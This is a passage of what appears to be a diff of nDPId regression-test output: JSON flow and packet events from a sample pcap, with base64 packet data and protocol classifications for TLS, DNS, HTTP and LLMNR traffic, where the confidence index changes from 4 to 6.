2g0EYheGp2VL2NvXgnD2ikpgTUWxxOX40I6u2o6OTbP2RNpQ9m8KCHjwUMiisO3DyvkoNm8lZ6ZPWkev9k5y7txVdM8LiyyQoSG929RxmQGshqjjCdAsjAk+bbGLy98uGf3QTIpvsX0AlZ7fP\/qiRzGtQg=="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1087,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"flow_min_l4_payload_len":1093,"flow_max_l4_payload_len":1093,"flow_tot_l4_payload_len":1093,"flow_avg_l4_payload_len":1093,"midstream":1,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"31.13.87.36","src_port":53580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414296,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414296,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1088,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414296,"pkt":"ABAj4ACgYMVHBbyMCABFAABAzwZAAEAGcgXAqAUQwKhzS9F6Abs0INrqAAAAALAC\/\/+nvgAAAgQFtAEDAwUBAQgKGg+ZQgAAAAAEAgAA"} 01404{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1089,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":2,"flow_last_seen":1470104414296,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":759,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":759,"pkt_l4_len":725,"thread_ts_msec":1470104414296,"pkt":"TF4M6gNlYMVHBbyMCABFAALpkqNAAEAGaYLAqAUQHw1XJNFMAbv8UnEzBJ2iMIAYEABq4wAAAQEIChoPmUJf7iUmFwMDArD5LAelFwFlufuyco4s\/\/Qvv+UsF7KG3W2aXVv9903LV87nxtNAIzAtPlUtxAIPT+QYQYOyjbvxtQ+Q3w2BeXCdTeBc2Vvhlyi2kFxwf1jLqB8jaDJwivP\/xGW9s5xZd+K0vcco68WAGVVhFXALDf8rp7nos7l2c3eCb9+ciqE2R8G8Pf4MZ5pCC83zl7gfBWwkh4JHUeVVNouVvCgmUz7pPOU27GiOZYmbf0iAqd6+kgzDqsVjJGMyvKT\/fOgiH+fRlxhK8fgLFTMvUw6JGt\/UsaYL4RE69L+mCP1NuNnyVxeorLPVKIVZ13X2miaLYk2DWr9BibPpp3QKFrWmy8E3NKq4Ls+dcN8upVmfmDj7xZcV58HYFhdLrgO56pzKogay7LJ\/Pef6DyPMYVTwySpdKas1Aq+IzlVKtxcR8k6I3pw5YMLWtutrLSrH5ABSNgfMJjpr7KO2g8MPyxfJHjp2vDiI+ruSCa4CqxUVcHS+ZRTOUS6b9R2wmUCu6Y6KCOkMK6zLaxdsVh2SuDnapzRD7fveixQuUMvdOAMX7X4K41IkMkOElwsydkORTyAInVQi4oBSOBugr0DMtesGCV044xeQCLnW8sd4RkMZjJZ4QhcfoxPlJX+f43AY0PNflsTA9yNhamZf4IabRxMggb\/lds0+jUTPyPfEWIc3bobDla0SyHhLFLXgk1Ee+Oe4AxYayqQxnLn\/4p\/VoNfV4WOaHdYeCMPZ3SK54BPrr3dXSTfyhV2DUhdJ\/67K7IkFW2cC4kKBJWWCDD28cyiCT6LF9mykZ0ExSXEgjBCLfnxWyJ4aekEg78E+rUf7kdSBDRTW3tDoKcMJPCumkIQ5L3nUbGzQ3I0QnDhkpOFdM4JoimsOVpik4zef5xLCds4Ul8v94jeMaHT0fOcIvOZn5GhO"} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1092,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":1470104414301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxABAj4ACgCABFAAA0AABAAEAGQRjAqHNLwKgFEAG70XokV4DmNCDa64ASFtDXBQAAAgQFtAEBBAIBAwMH"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1093,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414301,"pkt":"ABxCjnAxTF4M6gNlCABFAAA0wvZAAFgGI+QfDVckwKgFEAG70UwEnaIw\/FJxM4AQAQMsTQAAAQEICl\/vEucaD5lC"} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1095,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":3,"flow_last_seen":1470104414301,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1470104414301,"pkt":"ABAj4ACgYMVHBbyMCABFAAAohwxAAEAGuhfAqAUQwKhzS9F6Abs0INrrJFeA51AQIAAOqAAAIEVKRkRF"} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1099,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414296,"flow_last_seen":1470104414302,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1470104414302,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01097{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1101,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1470104414296,"flow_last_seen":1470104414305,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":378,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1470104414305,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"192.168.115.75","src_port":53626,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"192.168.115.75","ja3":"799135475da362592a4be9199d258726","ja3s":"573a9f3f80037fb40d481e2054def5bb","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1470104414395,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1470104414395,"pkt":"TF4M6gNlYMVHBbyMCABFAABL64oAAP8RYP7AqAUQqF8BAfeMADUAN6RcbYwBAAABAAAAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAE="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1111,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414395,"flow_last_seen":1470104414395,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1470104414395,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00770{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":2,"flow_last_seen":1470104414402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1470104414402,"pkt":"ABxCjnAxTF4M6gNlCABFAAET0UQAAPgRgXyoXwEBwKgFEAA194wA\/yfZbYyBgAABAAYAAAAABmRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwAAABAAHADAAFAAEAAUxDAC0GZGwtb2JzCG9mZmljaWFsBGxpbmUFbmF2ZXICanAJZWRnZXN1aXRlA25ldADAOwAFAAEAAACwADUKY2FjLWRsLW9icwhvZmZpY2lhbARsaW5lBW5hdmVyAmpwCWxpbmUtemVybwZha2FkbnPAY8B0AAUAAQAAAQAAEgVhMTg2NwJnMgZha2FtYWnAY8C1AAEAAQAAAAUABMtFUUnAtQABAAEAAAAFAATLRVFCwLUAAQABAAAABQAEPdw+2g=="} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104414402,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.69.81.73"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1112,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1470104414395,"flow_last_seen":1470104414402,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1470104414402,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"168.95.1.1","src_port":63372,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"dl-obs.official.line.naver.jp","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"203.69.81.73"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1470104414404,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1470104414404,"pkt":"TF4M6gNlYMVHBbyMCABFAABA+kNAAEAGXi3AqAUQy0VRSdF7AFCoMQrOAAAAALAC\/\/8cMAAAAgQFtAEDAwUBAQgKGg+ZqwAAAAAEAgAA"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1116,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104414404,"flow_last_seen":1470104414404,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1470104414404,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -463,295 +463,295 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1118,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0pGZAAEAGtBbAqAUQy0VRSdF7AFCoMQrPv\/BSvYAQEBXAXgAAAQEIChoPma4bhF1G"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1119,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":2,"flow_last_seen":1470104414407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1470104414407,"pkt":"ABxCjnAxTF4M6gNlCABFAAA8AABAADsGXXXLRVFJwKgFEABQ0Xzxz9ee9giQ0aAScSCl7QAAAgQFtAQCCAobhF1HGg+ZrAEDAwU="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1120,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1470104414407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1470104414407,"pkt":"TF4M6gNlYMVHBbyMCABFAAA0fmZAAEAG2hbAqAUQy0VRSdF8AFD2CJDR8c\/Xn4AQEBU1wQAAAQEIChoPma4bhF1H"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1121,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53628,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716971500\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1122,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1470104414404,"flow_last_seen":1470104414408,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1470104414408,"l3_proto":"ip4","src_ip":"192.168.5.16","dst_ip":"203.69.81.73","src_port":53627,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"dl-obs.official.line.naver.jp","url":"dl-obs.official.line.naver.jp\/r\/talk\/m\/4697716954688\/preview","code":0,"content_type":"","user_agent":"DESKTOP:MAC:10.10.5-YOSEMITE(4.7.2)"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1470104416855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416855,"pkt":"AQBeAAD8uKxvwfbSCABFAAA3J2UAAAERi4vAqGUh4AAA\/PVmFOsAI\/xOWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1171,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.101.33","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1470104416855,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1470104416855,"pkt":"AQBeAAD8cPGh+Cr9CABFAAA3CxAAAAERB\/nAqAUJ4AAA\/PVmFOsAI1xnWbQAAAABAAAAAAAACUpvYW5uYS1QQwAA\/wAB"} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1470104416855,"flow_last_seen":1470104416855,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1470104416855,"l3_proto":"ip4","src_ip":"192.168.5.9","dst_ip":"224.0.0.252","src_port":62822,"dst_port":5355,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 